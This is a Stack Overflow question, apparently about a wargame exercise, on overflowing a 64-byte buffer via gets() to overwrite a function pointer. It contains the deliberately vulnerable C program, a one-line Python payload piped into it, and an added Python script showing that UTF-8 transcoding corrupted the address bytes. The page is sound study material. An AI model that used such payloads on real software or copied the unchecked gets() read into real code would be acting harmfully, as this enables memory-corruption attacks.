Buffer Overflow Exploit Issue


I am trying to complete a buffer overflow that involves overwriting a function pointer. The vulnerable C program is as follows:

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void win()
{
  printf("code flow successfully changed\n");
}

int main(int argc, char **argv)
{
  volatile int (*fp)();
  char buffer[64];

  fp = 0;

  /* unchecked read from stdin that overflows buffer into fp
     (call restored here; the extraction dropped it, but the question
     pipes input into the program and observes buffer filled with 0x41) */
  gets(buffer);

  if(fp) {
      printf("calling function pointer, jumping to 0x%08x\n", fp);
      fp();  /* call restored: this is the jump the message announces */
  }
}

I've already run gdb on the program and found that the size of "buffer" is 72 bytes and the function address is 0x555546ca. So, I pipe in

python3.6 -c "print('A' * 72 + '\xca\x46\x55\x55')" | ./stack3

and get a weird result:

calling function pointer 0x55468ac3
Segmentation fault (core dumped)

After examining memory, I found that the buffer was filled properly with 0x41s, but the next two words (fp*) were 0x55468ac3 and 0x00000055. I cannot understand why the data is obscured in this way.

asked on Stack Overflow Nov 23, 2017 by K. Jiang
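The two "obscured" words the question reports can be reproduced without a debugger by modelling what Python 3's print() actually sends down the pipe and what gets() stores. This is an added diagnostic example, not code from the question or from the exercise; it assumes the interpreter's stdout encoding is UTF-8 and that stack bytes beyond what gets() wrote read back as zero (both assumptions, marked in the code).

```python
import struct

# Payload exactly as the question constructs it: a Python 3 str, not bytes.
PAYLOAD_STR = 'A' * 72 + '\xca\x46\x55\x55'


def bytes_sent_by_print(s: str, encoding: str = 'utf-8') -> bytes:
    """Model print(s) writing to a pipe: the str is transcoded with the
    stream's encoding (assumed UTF-8 here) and a newline is appended.
    Any character above U+007F expands to more than one byte."""
    return s.encode(encoding) + b'\n'


def non_ascii_expansions(s: str, encoding: str = 'utf-8'):
    """Every character that does not survive as a single byte, paired with
    the byte sequence the encoding substitutes for it."""
    return [(c, c.encode(encoding)) for c in s if ord(c) > 0x7f]


def words_after_buffer(data: bytes, buffer_len: int = 72, nwords: int = 2):
    """Model gets(): consume up to the first newline (the newline itself is
    not stored), then read nwords little-endian 32-bit words starting right
    after the buffer. Bytes past what was written are assumed to read back
    as zero (assumption), which is what the question's 0x00000055 shows."""
    line = data.split(b'\n', 1)[0]
    tail = line[buffer_len:].ljust(4 * nwords, b'\x00')
    return [struct.unpack_from('<I', tail, 4 * i)[0] for i in range(nwords)]


def intended_word() -> int:
    """The value the four escapes would yield if they had reached the
    program as raw bytes (little-endian): what the asker expected."""
    return struct.unpack('<I', b'\xca\x46\x55\x55')[0]


if __name__ == '__main__':
    raw = bytes_sent_by_print(PAYLOAD_STR)
    print('non-ASCII expansions:', non_ascii_expansions(PAYLOAD_STR))
    print('bytes after buffer  :', raw[72:].hex())
    print('words fp slot holds :', [hex(w) for w in words_after_buffer(raw)])
    print('word that was meant :', hex(intended_word()))
```

Run it and the first word comes out as 0x55468ac3: U+00CA is encoded by UTF-8 as the two bytes c3 8a, so the four escapes become five bytes (c3 8a 46 55 55) and the second word is the stray 0x55 followed by the NUL that gets() appends. The general point for anyone reviewing scripts that feed another process is that text-mode I/O transcodes silently; data that must arrive byte-for-byte has to be built and written as bytes, and a hexdump of what actually crossed the pipe is the quickest way to catch the mismatch.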

0 Answers

Nobody has answered this question yet.

User contributions licensed under CC BY-SA 3.0